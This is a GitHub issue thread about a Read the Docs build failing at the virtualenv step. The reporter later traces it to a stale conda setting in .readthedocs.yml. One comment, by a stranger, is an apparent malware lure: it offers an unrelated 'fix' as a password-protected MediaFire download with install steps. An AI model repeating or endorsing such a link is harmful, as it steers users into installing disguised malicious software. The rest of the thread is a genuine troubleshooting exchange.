### ISSUE TITLE
Python virtualenv build fails

### ISSUE THREAD

**Issue by chrispyles** [readthedocs/readthedocs.org#11576]
## Details

When building my project after recently switching to poetry for dependency management, RTD fails with an error (see Actual Result below) when creating its virtual env. None of my configured build steps to install poetry have occurred at this point, so I think this is an error in RTD's build process.

One thing I noticed is that there's no space between `-m` and `virtualenv` but I'm not sure if that's the command being incorrect or just incorrect rendering on the site.

I do have conda configured but this hasn't changed recently (been using it for a few years) so I don't think it's the cause of the issue.

* Read the Docs project URL: https://readthedocs.org/projects/otter-grader/
* Build URL (if applicable): https://readthedocs.org/projects/otter-grader/builds/25490172/

## Expected Result

A successful image build

## Actual Result

```
# python -mvirtualenv $READTHEDOCS_VIRTUALENV_PATH
usage: virtualenv [--version] [--with-traceback] [-v | -q] [--read-only-app-data] [--app-data APP_DATA] [--reset-app-data] [--upgrade-embed-wheels] [--discovery {builtin}] [-p py] [--try-first-with py_exe]
                  [--creator {builtin,cpython3-posix,venv}] [--seeder {app-data,pip}] [--no-seed] [--activators comma_sep_list] [--clear] [--no-vcs-ignore] [--system-site-packages] [--symlinks | --copies] [--no-download | --download]
                  [--extra-search-dir d [d ...]] [--pip version] [--setuptools version] [--wheel version] [--no-pip] [--no-setuptools] [--no-wheel] [--no-periodic-update] [--symlink-app-data] [--prompt prompt] [-h]
                  dest
virtualenv: error: the following arguments are required: dest
SystemExit: 2
```

**Comment by chrispyles** [comment]
Nevermind, figured out the issue.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by humitos** [comment]
Hi, would you mind commenting what was the solution you implemented? That will help other users arriving at this issue.

**Comment by chrispyles** [comment]
Sure. I had actually removed the conda environment file I used for RTD since poetry now managed the dependencies, but I hadn't removed the conda config from the .readthedocs.yml file.

As an aside, it might be nice to add some validation that the files referenced in the config exist; the error here was caused by a nonexistent file but that is not obvious at all from the error message.
